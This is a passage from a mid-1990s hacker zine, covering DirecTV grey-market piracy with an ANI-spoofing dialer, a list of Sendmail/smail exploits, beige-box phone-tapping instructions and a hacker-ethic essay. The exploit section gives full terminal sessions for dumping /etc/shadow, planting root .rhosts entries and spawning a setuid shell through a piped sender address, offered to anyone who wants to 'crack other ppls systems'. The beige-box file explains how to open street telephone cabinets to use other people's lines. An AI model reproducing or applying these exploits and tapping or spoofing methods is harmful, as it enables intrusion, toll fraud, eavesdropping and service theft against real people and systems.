pay-per-view credits, sports etc. An earlier plan to offer 4
different cards with different tiers of programming has been
abandoned because it has been found that the card cannot be
duplicated. Any DSS receiver can be cloned to work with any
smartcard. It can also be shut off independently of the
smartcard. A benefit for users of reprogrammed smartcards is
that they will have to maintain some level of subscription so they
will not lose all programming when the card is shut off and has
to be reprogrammed. A huge problem with making a business
of any hack for the DSS system involves the massive security
which is in place. Current plans involve distribution of
programming software to 500 sites. The software will only be
able to program 100 cards, then new software must be
purchased. This ensures that the deveopers will be paid
frequently. The software will not be generally distributed or
posted on BBS's. We do not know more about the distribution
system. Each card being reprogrammed requires a separate
program. A better distribution system would involve the internet
and would allow individuals to reprogram their cards directly
using the phone line, which is DirecTV's own backdoor into
the box. In the short term, piracy of the DSS system may be
of the gray market variety and may exclusively involve use of
the DBS Dialer which has just been developed.
Gray Market Piracy - The Dialer Systems
Some non U.S. residents subscribe to DirecTV programming
by simply obtaining a U.S. billing address. Any phone book
lists Mail Receiving Services which provide a street address.
Many telephone answering services also provide this service
as well as private phone lines. When they subscribe they
simply say they do not have a phone. This precludes them
=66rom ordering sports packages like NFL Sunday Ticket,
NBA League Pass, the NHL Center Ice package or the regional
sports networks. They must also order special events manually
at an additional charge of $2. Since many foreign subscribers
do want access to sports and PPV events it was natural for a
variety of call forwarding services to be established.
The two dialer systems which are the subject of the press
release from DirecTV have been operating in Canada for
several months. One system is based in Ontario and the other
is in British Columbia. The Ontario system was diverting
monthly calls from the DSS boxes to a Western NY number while
the B.C. system diverted its calls to Blaine Washington.
Canadians have been purchasing thousands of DSS systems and
they are even being sold in major consumer electronics stores.
The head of the CRTC which is the Canadian equivalent of the
FCC has said on the national news that Canadians will not be
prosecuted for subscribing to DirecTV. At the same time DirecTV
has no legal right to extend subscriptions to Canadian residents.
Those complaining about DSS are the cable companies and
Expressvu, a Canadian based DBS service which is almost ready
to launch. With their dismal raster of Canadian programming they
cannot possibly compete with gray market DirecTV programming
even though Canadians must pay the high subscription prices
charged by DirecTV and USSB with Canadian dollars which are
worth $.70 U.S.
The dialers currently being used by the Canadians are Equal
Access dialers which were used at one time to dial the prefix to
connect to Sprint. They are now surplus and the operators of
these dialer services have been purchasing quantities of them
for $30 each and then charging Canadians $150 apiece with a
subscription to their redialer service. That only involves
establishing U.S. phone numbers to route the calls through.
Some operators only had one or a few U.S. numbers so
hundreds of DSS systems were connected to Canadian
phone lines and routing their monthly PPV billing calls
through the same U.S. phone number. The dialers pass ANI
data from the originating phone number as call forwarding
systems do. In addition, the systems are not secure. To
exacerbate the situation, the phone numbers being used
were posted on BBS's so many individuals piggybacked
on the system. Some foreign subscribers even plugged
their DSS boxes directly into the phone line, essentially
requesting that their systems be shut off. The problem is
that ANI (actually ANAC: Automatic Number Announcement
Circuit) data is transmitted with phone calls. This data identifies
the billing phone number including area code. Businesses like
DirecTV which rent 800 numbers receive ANI data along with
other caller information and callers to 800 numbers give up that
data whether they know it or not, and regardless of whether
their phone number is unlisted or not.=20
The DBS Dialer
This is a newly engineered gray market product intended for
use by those in offshore countries where DirecTV is not
licensed to operate. It is available from New Advanced
Technologies at 514.458.3063. The system consists of two
units. The dialer is connected between the DSS unit and the
phone line. It intercepts the 800 number call made by the unit
and routes it to whatever U.S. number it has been programmed
to call. The call is received by the diverter unit which strips out
ANI data associated with the true phone number and substitutes
the ANI of the billing phone number the diverter is connected to.
The diverter must be connected to a line with three way calling
capabilities.
The DBS Dialer system has many desirable features. It allows
users to operate their own system independently without having
to subscribe to someone's service. It is not necessary to reveal
phone numbers to anyone who might piggyback or otherwise
compromise the system. Users are not reliant on the supplier
and need not pay subscription fees.. Both dialer and diverter(s)
are password protected and the password of the the dialer(s)
must match that of the diverter. Anyone wanting to piggyback
on the system would have to know the password as long as it
is changed from the default value of 1234. The system is
completely field programmable and there is a separate
password allowing access to programming functions. The
system has been designed so that in case of a power failure
the dialer unit shuts down rather than pass ANI data about
the location of the system. DirecTV uses several 800 numbers
and DSS units store them in both the "smart" modem and in
EEPROM. The DSS modem can be programmed to execute
a wide variety of countermeasures. Designers of the DBS
Dialer have taken this into consideration. The code in the
diverter may be updated if it is necessary. The designers
are now adding capture, store and forward technology to the
dialer so it won't matter what number the DSS unit calls. The
Canadian dialers were shut off when DirecTV changed the
number the DSS units called. They can be reprogrammed
but a simple command in the data stream will shut them off
again and they will have to be reprogrammed again. .
DBS Dialer - Programming
The dialers have two RJ11 jacks. Ordinarily the DSS unit
is connected to the jack marked DSS. For programming
purposes a telephone is connected to this jack. A standard
telephone line is plugged into the other.
We received a beta version of the dialer and diverter for test
purposes. We began our test by changing the programming
password to 2198. We changed the dialer and diverter pass
words to 9299. They must be the same. In a case where
more than one diverter is used in a network, the diverter
passwords must match as well. We programmed the dialer
to call the number where the diverter was located. We left
the trigger sequence at the default value of 1-800 but If we
were on a phone system where we had to dial 9 to call out
then we would have programmed it in place of 1-800. Call
capture store and forward capability is being added to the=20
system so the programming instructions we included in the=20
hard copy version of this report are now redundant. We also=20
stated that in the New Advanced Technologies advertisement
that it supplies U.S. addresses and phone numbers. It does=20
not.
Telephone companies maintain regional ANI circuits to assist
line technicians with testing and line identification. Dialing
one of these numbers connects the caller with a computer
which reads back his ANI data. We used 1-800-MY-ANI-IS
which is an MCI service. Another service is at 10732-1404988
9664. It is also a toll free number. We connected a phone in
place of the DSS receiver and made the call. The dialer
intercepted the number we dialed, forwarded the call to
diverter, and the diverter called 1-800-MY-ANI-IS. The
ANAC computer reported the phone number and area
code where our diverter box was located and not the
actual phone number we were calling from. Individuals
=66rom Canada, Mexico and the Caribbean have also tested
the system and found it to work. The DBS Dialer worked=20
perfectly. It does the job it was designed to do.
The footprint of the DirecTV signal covers the continental
U.S.and most of Canada We have heard of reception as
far south as Mexico City (with a 3 foot dish) and throughout
the Caribbean. The DBS Dialer allows individuals in those
countries to subscribe to programming and receive pay-per-
view events. A very low profile system would have only one
DSS system connected to a diverter box located at a U.S.
address but some individuals may establish small networks.
We have no knowledge of the laws regarding the reception
of DirecTV programming in the various countries where the
signal is available. Since the system passes voice as well
as data calls it could conceivably be used to make use of
800 numbers in the U.S. or possibly to reduce long distance
charges. It could also be used by networks of cautious
individuals to manually order PPV events. The common
phone number could easily be that of a business with
several employees who have DSS systems.
The system could also be used by U.S. residents or
commercial establishments to obtain locally blacked out
sports events by misleading DirecTV about the true location
of the system. Using the DBS Dialer in the U.S. is a serious
crime and subjects users to the variety of criminal and civil
actions mentioned in DirecTV's press release. The units
could also be used by individuals who obtain the deluxe
system and take advantage of the reduced subscription
rates available to additional units. We have heard that
DirecTV is now insisting that all units in a deluxe system
be connected to the same phone number.
Appendix
DIRECTV PREPARES LEGAL ACTION AGAINST=20
UNAUTHORIZED DISTRIBUTORS
Complaints Seek to Prevent Illegal Reception of DIRECTV
Service Within Canada
Los Angeles, CA. June 19, 1995 - DIRECTV, inc., a unit of=20
Hughes Electronics Corporation, took action against=20
individuals and entities in Canadawho have facilitated the=20
illegal reception of the DIRECTV programming service in=20
Canada. Cease and desist letters were issued to five potential=20
civil defendants, four of whom are located in Canada.=20
DIRECTV is also preparing to file civil claims against the=20
potential defendants in U.S. federal courts.
In addition, DIRECTV is deactivating the accounts of more=20
than 600 known "grey market" Canadian subscribers whose=20
accounts with DIRECTV had been activated by the defendants.=20
These steps by DIRECTV are part of its ongoing broader=20
effort to actively protect its programming rights and to secure=20
the signal integrity of the direct broadcast satellite (DBS)=20
service.
A civil complaint was delivered with the cease and desist letters=
=20
sent to David A. Diebert of Echo Communications and/or Dragon=20
Pacific, Vancouver, B.C.; Mike McAllister of Version II Marketing,=
=20
Waterloo, Ontario; National Computers and Supplies, also of=20
Waterloo, Ontario; Digital DTH Distributors, Edmonton, Alberta;=20
and Propack Inc., Blaine, Washington. The complaints are to be=20
filed shortly in U.S. District Courts in the states of=20
Washington and New York if the defendants do not meet the=20
demands contained in the letter.
The civil claims are a result of investigations by the
DIRECTV Office of Signal Integrity, which is headed by=20
former FBI Special Agent Larry Rissler. Rissler's=20
investigation revealed that the defendants, through the
distribution of equipment and attempts to manipulate the=20
DIRECTV customer service system, facilitated the reception=20
of DIRECTV programming by residents
of Canada. These actions were detected by DIRECTV=20
through its sophisticated security systems and procedures.
Further, the complaint alleges that the defendants assisted=20
individuals in obtaining programming by attempting to disguise=20
the location of the installed DSS(tm) system through electronic=20
devices and other schemes. These actions violate several U.S.=20
federal statutes, all of which also carry substantial criminal=20
penalties.
"We're committed to the identification and, where=20
appropriate, the prosecution of those individuals and entities=20
who foster the unauthorized receipt of DIRECTV=20
programming," said Rissler. "These actions are the first
visible results of an aggressive on-going campaign by=20
DIRECTV to protect its service and attack all types of=20
unauthorized use, including Canadian grey market activities,=20
as well as any residential or commercial misuse
within the United States," Rissler added.
The federal statutes cited in the complaints are the Federal=20
Communications Act, which prohibits the unauthorized receipt=20
and use of satellite communications, including commercial=20
television programming; the Federal Wiretap Statute, which=20
proscribes the use of electronic or mechanical devices for the=20
surrepetitious reception of satellite programming; and the
Computer Fraud and Abuse Act, which addresses the=20
transmission of false information through sophisticated=20
computer systems.
According to DIRECTV, the filing of the civil complaints=20
would mark the first known use of the Computer Fraud=20
and Abuse Act to address satellite signal theft. Because of=20
the sophisticated nature of the computerized DIRECTV=20
authorization and billing system, the elctronic devices used by
the defendants resulted in telephone calls from the DSS=20
receivers to the DIRECTV computer system which were=20
detected and traced to the DSS units authorized by the=20
potential defendants.
The civil complaints also cited Washington and New York
state causes of action, including wrongful interference with=20
DIRECTV programming contracts and wrongful interference=20
with prospective business advantage.
In all instances, DIRECTV has demanded that the defendants=20
immediately cease and desist the illegal action. Failure to=20
comply could lead to the issuance of injunctions ordering the=20
defendants to stop the illegal activities and the assessement of=
=20
monetary damage awards. In the case of the Federal=20
Communications Act, damage awards can be as much as=20
$110,000 for each violation.
DIRECTV and DSS are trademarks of DIRECTV Inc., a unit of=20
Hughes Electronics Corporation. The earnings of Hughes
Electronics Corp., a wholly owned subsidiary of General Motors=20
Corporation, are used to calculate the earnings per share=20
of General Motors Class H Common Stock (NYSE:GMH).
For more information, please contact:
DIRECTV, Inc.
Linda F. Brill
Director, Public Relations
(310) 535-5062
Resources
American Hacker BBS.Access is included with a subscription to
the hardcopy version of this newsletter. There is a free bulletin=
=20
section which is free to all. If there are any radical=20
developments we will post news there. We also post to=20
various Usenet news groups. 716.871-1915
Bomarc Services has some schematics for the RCA receiver=20
(see their ad in this issue). They are contract reverse engineers=
=20
and they have thousands of schematics available for all kinds=20
of electronic devices including most cable boxes. A catalog of=20
their 22 product categories costs 4 stamps. The catalog of=20
cable and satellite descramblers, converters etc. costs $5.
The following DSS schematics are available: Full Signal=20
Modulator w/RF switch (Alps 3N0110A-US. $2. DSS Tuner=20
Module (Sharp B5532). $4.Dual Polarity Single Channel=20
Ku Band LNB for DSS Systems. $1. Dual Polarity Dual=20
Channel DSS LNB. $2. Bomarc Services,Box 1113,=20
Casper, WY, 82602.=20
Triangle Products is the major supplier of Oak decoders. They=20
are available in VCII card cages for those who don't wish to=20
use free-standing units. New Oak encrypted channels include=20
Mandarin and Filipino. They also carry SureWrit 9, which is a=20
diagnostic test device for those studying VCII or 029 PLUS=20
technology. They have raw B-MAC's as well. 616.399.6390.
Hack Watch News is the foremost hacker newsletter in Europe. It
is available by electronic delivery or by mail. It is written by=
=20
John Mc Cormac who is the author of the "European=20
Scrambling Systems" series. They are comprehensive texts=20
on scrambling. John's Special Projects BBS is a repositary for=20
Videocrypt information, smartcard programs with source code=20
etc. Voice 011-353-51-73640 voice. BBS 011-353-5150143.=20
E-mail [email protected]. He has an article in the August issue of=20
Electronics Now entitled "Has DSS been Hacked ?" That article is=20
available at http://www.iol.ie/~kooltek/hasdss. We have greater=20
quantity and more current information on the U.S. system=20
in our zine American Hacker.European Scrambling=20
Systems Volume 4 is 500 pages long and concentrates=20
on Videocrypt. It is available from Baylin=20
Publications, 1-800-483-2423.=20
New Advanced Technologies manufactures and distributes DBS
Dialer Systems. They invite inquiries for single units or networks.
Voice 514.458.3063. FAX 514.458.0798.
END PART 2 OF 2 PARTS
-------------------------------------------------------------------
File #5 of 8...
=09=09=FA=FA=FA=FA=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=
=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=FA=FA=FA=FA
=09=09=09S e n d M a i l - =E1 u g s
=09=09=09
=09=09=09 =EE x p l o i t s
=09=09=09=09 Lists
=09=09=09=09 v.01=E1
=09=09 =FA=FA=FA=FA=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=
=C4=C4=C4=C4=C4=FA=FA=FA=FA
=66rom Hacknet, [email protected]
Introduction and Legal Ramble
-----------------------------
This is written for anyone thats interested in learning about the
many Security holes that are resident in many versions of Sendmail.
I do not care if you use it to protect your system against others,
or crack other ppls systems...just don't involve me in it.
I wrote it to collate all the information on sendmail into one list
for convience and perhaps it will help some people.
I would like to thank the unknown person who started this off long=
=20
time ago....
This paper is © 1995, however I do not object, to you including
any of these in a FAQ, printed magazine, book etc... just mail me fir=
st=20
so I known where it's distributed *:^)
Have you spotted a mistake or anything I could add? Then just add you=
r
own stuff and put yourself down on the credits and mail it me :)
Note: This is v.01b so there is bound to be mistakes and there are al=
ot
of other stuff to add as well....and expand it to include FTP daemon =
bugs?
I am extremely busy..and am only releasing it due to popular demand.
OH, please tell me what versions these work on!
***
Bug #1
***
Sendmail Version affected: 3.1.28, any more ?
SYNOPSIS
--------
Use of ~/.forward and debug lets a local user read any file on the sy=
stem.
EXAMPLE OF EXPLOITATION
-----------------------
user@psyops ~> ln -s /etc/shadow .forward
user@psyops ~> ls -la .forward
lrwxrwxrwx 1 user users 11 Sep 5 12:08 .forward -> /e=
tc/shadow
user@psyops ~> telnet localhost smtp
Trying 127.0.0.1...
Connected to localhost
Escape character is '^]'.
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12=
:10 PDT
debug 20
250 Debugging level: 20
expn user
[lots of text]
expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile: opening forward file /home/user/.forward
[more text]
read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection
Connection closed by foreign host.
---------------
Contrary to popular belief, adding -smtp_debup to your smail config f=
ile
will not prevent this bug from occuring. It will just prevent exploi=
tation
via the smtp port.
We can just do this....
----------
user@psyops ~> smail -bs -v20
expand_string($primary_name Smail$version ready for mail on $date,(nu=
ll),
(null)) called
expand_string returns psyops.warez.mil Smail3.1.28.1 ready for mail o=
n
Mon, 5 Sep 94 12:15 PDT
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12=
:15
PDT
expn user
[same text as before]
expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile: opening forward file /home/user/.forward
[more of same text]
read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[.....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection
----------
To fix this, you should get rid of the -d and -v options for smail
as well as adding -smtp_debug to your config file.
***
Bug #2
***
Sendmail Version affected: 3.1.28, any more ?
SYNOPSIS
--------
Smail called with the -D flag will allow you to create and append to =
any
file on the system.
EXAMPLE OF EXPLOITATION
-----------------------
user@psyops ~> cat > ~/.forward
localhost user
^D
user@psyops ~> smail -bs -D ~root/.rhosts -v20
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12=
:23 PDT
expn user
250 user
quit
221 psyops.warez.mil closing connection
user@psyops ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=3D0(root) gid=3D0(root)
--------------
Patch this by removing the -D option from smail.
I received the following patch recently. I haven't tested it, so use
at your own risk.
*** Omain.c Wed Mar 11 12:33:18 1993
--- main.c Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
}
- /*
- * change error file to debugging file from -D option, if any
- */
-
- if (arg_debug_file) {
- new_errfile =3D fopen(arg_debug_file, "a");
- if (new_errfile =3D=3D NULL) {
- write_log(LOG_TTY, "Warning: Cannot open debug file %s: %=
s\n",
- arg_debug_file, strerrno(errno));
- arg_debug_file =3D NULL;
- } else {
- errfile =3D new_errfile;
- fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n"=
,
- program, (long)getpid());
- }
- }
/*
* read in the transport, router and director files, if needed
*
* NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
***************
*** 525,530 ****
--- 508,537 ----
if (prog_euid !=3D REQUIRED_EUID)
=09 queue_only =3D TRUE;
#endif
+ /*
+ * change error file to debugging file from -D option, if any
+ *
+ * JMJ: Change location of this fragment to below the setuid/se=
tgid
+ * calls to allow for use of fopen_as_user() instead of ju=
st
+ * fopen().
+ *
+ * Side effect: -D now requires full pathname to debug fil=
e
+ */
+
+ if (arg_debug_file) {
+ new_errfile =3D fopen_as_user(arg_debug_file, "a", 1, real_ui=
d,
+ prog_egid, 0600);
+ write_log(LOG_TTY, "Warning: Cannot open debug file %s: %=
s\n",
+ arg_debug_file, strerrno(errno));
+ arg_debug_file =3D NULL;
+ } else {
+ errfile =3D new_errfile;
+ fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n"=
,
+ program, (long)getpid());
+ }
+ }
/*
* error processing can be other than TERMINAL only for
--
***
Bug #3
***
Sendmail Version affected: ?
SYNOPSIS
--------
Files specified in ~/.forward can be created in any directory, regard=
less
of it's permissions. (File is still owned by mailbox owner, however.=
)
EXAMPLE OF EXPLOITATION
-----------------------
user@psyops ~> echo "/etc/nologin" > ~/.forward
user@psyops ~> mail -r root user < /dev/null
user@psyops ~> echo "Site shutdown due to smail lameness" >! /etc/no=
login
user@psyops ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.
---------
Plug up this hole by adding 'check_path' to the following part of
your /usr/lib/smail/transports file:
---
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin=
with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file: driver =3D appendfile,
=09return_path, local, from, unix_from_hack;
=09file =3D $user, # file is taken from address
=09append_as_user, # use user-id associated with addr=
ess
=09expand_user, # expand ~ and $ within address
=09check_path, #<--add this line
=09suffix =3D "\n",
=09mode =3D 0644
[....]
*****
BUG 4
*****
Version affected: 5.65?
=46rom CSC FAQ:
A SAMPLE EXPLOITATION
A sample session follows.
---cut here
[panix!jhawk] |% telnet panix.com 25
Trying 198.7.0.2 ...
Connected to panix.com.
Escape character is '^]'.
220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19=
:41:13
-0500
HELO
250 Hello panix.com, why do you call yourself ?
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
354 Enter mail, end with @.@ on a line by itself
From: jhawk"panix.com (John Hawkinson)
To: jhawk"panix.com (John Hawkinson)
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.
X-Disclaimer: We take no responsibility for what might happen
Hi there. Wanna play ball?
#!/bin/sh
#The above line is just in case :-)
echo This is a Serious Bug > /tmp/bug
echo id reports: >> /tmp/bug
/usr/bin/id >> /tmp/bug
echo Fixing this would be good >> /tmp/bug
cp /bin/sh /tmp/bugshell
chmod u+s /tmp/bugshell
echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug
chmod ugo+rx /tmp/bugshell
-------------------------------------------------------------------
File #6 of 8...
=09=09=09 Beige Boxing
=09=09=09By: Revolution
Of course, this article is for imformational purposes only, I
would never condone the use of any of this infromation to rip off
anybody. Credit is due to the Jolly Roger who described how to
build a beige box in his cookbook.
A beige box is just a phone with the two wires from the
headset to the jack cut and stripped, with alligator clips attached
to them. One of them is red, the ring wire, and one of them is
green, the tip wire. These are the two wires which carry a
conversation.
The moral of the story is, at many points in between your
phone and the phone of the person you are talking to, your phone
line comes above ground in various forms where it may be spliced
into rather easily with the so called beige box, allowing someone
to use your phone line for any purpose they like, including
attaching a bug to listen to your conversations.
These places are rather easy to find: find where your phone
line comes out of your house. There may be a small box attached to
the line somewhere on your house at ground level. Open the box,
and inside will be two, four or more screws. These screws will be
in groups of two, and will have wires attached to them. The trick
is to find where this wire is stripped but not directly attached to
the screw, and attach your alligator clips to them, one to each
wire. If you don't hear a dial tone, switch the alligator clips.
If there is not a box on a house near you, or that is a little
too risky for your taste, look at the bases of telephone poles
around your house. Many different items present themselves here,
all which can be opened and interfaced by your beige box. =20
One of these, and the most plentiful, is the green tree. It's
a small rectangular green pole that normally says "call before
digging," or something to that affect on the side of it. Two 7/16
rathcet bolts need to be turned a bit on each side of it before on
e half will lift off, revealing a bunch of wires under a palstic
bag, and a paper somewhere which reveals what phone numbers this
tree connects to. The wires all connect to a gray stalk at the
bottom to screws in sets of two, which is where you can beige box
=66rom.
Another item which is much like the above is the canisters
which appear at waist level attached to some older poles. One
screw must be undone, and then the top turns and lifts off, and can
be used like the one above.
On some poles there is a huge cabinet with a sticker which
says MIRROR IMAGE CABLE, or something else about cables. These are
sometimes padlocked, but sometimes just two handles must be undone,
one on the center and one on the top, and the cabinet opens to
reveal a ton of goodies. Facing you is a huge terminal board
connecting to hundreds of phones, which should be labeled on a
chart on the side. On both doors of the cabinet, when opened,
there are pockets which can reveal many things, including manuals
and more alligator clips. On some of them, you can push the
terminal board in and it swings down, revealing more manuals. Each
of these terminals can be beige boxed from.
Many things can be done with a beige box, including anything
you can do from your own phone, but free. If you need to ANI,
there are three digit codes for every area code that can be
obtained with a bit of social engineering, also 2002006969 has
worked for me in the past. Any and all questions, comments,
critiques go to [email protected]. Happy phreaking!
-------------------------------------------------------------------
File #7 of 8...
=09=09 "I Wanna Be a Hacker When I Grow Up"
=09I wonder if anyone's actually woken up one day and said
something to that effect. Hell, there must be some reason for the
countless world-wide "hackers" to do what they do. What is it? Fame=
,
fortune, money? Hardly.
=09First what is needed is to clarify some definitions here. A
hacker in the true original intent of the word is not the pale, weary=
,
acne-covered kid who lives on chips, dew, and pall malls whilst tryin=
g
to break into the Pentagon. No, that's the shit that the media feeds
everyone. That's the image of the 'nasty vile evil hacker' who must
be caught at all costs. A true hacker is really a quite benevolent
creature. One who seeks...no, seeks is too weak...one who craves
information, lives to learn more and to see more. Someone who gets b=
y
the security of someone's system merely to prove that it can be done
is in reality doing that sys admin a favor by pointing out the holes.
=09A 'cracker' on the other hand is, to be blunt, scum. A person
with skills, yes...but nothing more imaginative than what a terrorist
could think of. Unfortunately, most of the 'computer criminals' hype=
d
by the media are crackers that got caught doing some stupid thing.
They'll infect hard drives with virii, crash systems, crack password
files...all for the simple pleasure of doing it...nothing more.
=09So ya see...that is where the difference lies. A hacker has a
PURPOSE to his work, a goal, or a good reason to do what he does.
Screwing multi-billion buck fascist corporations like Ma Bell has a
purpose, a lofty goal. :) Screwing your local wal-mart or something
just for the sake of doing it is pathetic.
=09Lo and behold, hackers do have *gasp* ETHICS??? The answer
is, yes. I can't speak for all, of course. I have talked to alot of
really great people over the past few years since I've gotten into al=
l
this, and I've also encountered some real sleaze. But for the most
part, we are fairly ok. All in all, there are two types of people I
hate. I can't stand the newbies that jump onto the bbs's and just
straight-out ask to be given info...info that with even a little bit
of effort can be easily looked up. The first place I encountered thi=
s
underground-like stuff was at ISCA (yeayea, spare me the ISCA sucks
hard comments...I know it does these days). I just read messages for
nearly 4-6months or so, soaking it all in, grabbing addresses, ftp
sitez, everything I could get my hands on. Then after awhile, I foun=
d
I could take part in the discussions cause I actually had a clue for =
a
change. And the other type of person I can't fucking stand is someon=
e
who thinks they are some rad eleet hacker god who won't come down off
his high horse to associate with us 'neophytes.' Someone who is far
to caught up in their own persona. Hell, I give whatever info I can
(which isn't alot, I don't think, but others for some reason think so=
)
to whoever wants to learn...I mean, truly learn what it's all about.
A newbie poser who thinks he can be a leech is quite sadly mistaken.
=09It's not an image, it's not a elite power-trip thing. If you
want to get involved for those reasons, then take a walk. Sure,
everyone here has a little ego (and I'll be damned if mine didn't get
a little boost when I was asked to write this :) ), but don't let you=
r
ego get the better of you. =20
=09I have a tendency to get long-winded, but if you read this far
then I guess it wasn't too tough, eh?
-tarc
"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty or safety." - Benjamin Franklin, 1759
---------------------------------------------------------------------
And finally, file #8 of 8...
=09=09=09 T H E E N D
=09May I remind you that this may not have been the end if you had
chosen to contribute an article or two. All contributions are welcom=
e!
Send them to [email protected]. And please, send what you think of=
the
zine, I'd like there to be a letter's column next month. I can be re=
ached
as Revolution on isca, shadow, brinta, thanatos, and monolith. I can=
also
be reached as Mike Scanlon at 1+518-279-1594, or stop by 12 Maple Ave=
nue=20
Eagle Mills, NY 12180. =20
=09And where ever you hack, may the ethic be with you......
=09"'The technology has to be considered as larger than just the=20
inanimate pieces of hardware,' said Felsenstein. 'The technology repr=
esents
inanimate ways of thinking, objectified ways of thinking. The myth w=
e see
in War Games and things like that is definitely thetrimuph of the ind=
ividual
over the collective dis-spirit. [The myth is] attempting to say that =
the
conventional wisdom and common understandings must always be open to =
question.
It's not just an academic point. It's a very fundamental point of, y=
ou might
say, the survival of humanity, in a sense that you can have people [m=
erely]
survive, but humanity is something that's a little more precious, a l=
ittle
more fragile. So that to be able to defy a culture which states that=
'Thou
shalt not touch this,' and to defy that with one's own creative power=
s
is...the essence.'
=09"The essence, of course, of the Hacker Ethic."
=09=09=09=09The immortal Steven Levy, from the original
=09=09=09=09=09=09=09"HACKERS"
=09 Editor:Mike Scanlon Access to computers-and anything w=
hich
HTTP site://www.gsu.edu/~socrerx might teach you something abo=
ut the=20
of the month:/catalog.html way the world works-should be=
unlimit-
WaReZ site of: ed and total. Always yield t=
o the
the month:127.0.0.1 Hands-on Imperative!
mailing list: =20
of the month:Billwatch Mistrust authority-promote de=
central-
Overprotective: ization.
parent of the:
=09 month:Senator Exon Hackers should be judged by their =
hack-
Endangered: ing, not bogus criteria such =
as degrees
species of the:The great American age, race, or position.
=09 month:Hacker
=09=09=09=09=09You can create art and beauty on a=20
=09=09=09=09=09computer.
=09=09=09=09=09Computers can change your life for the
=09=09=09=09=09better.
=09=09 All Information should be free!
|
|
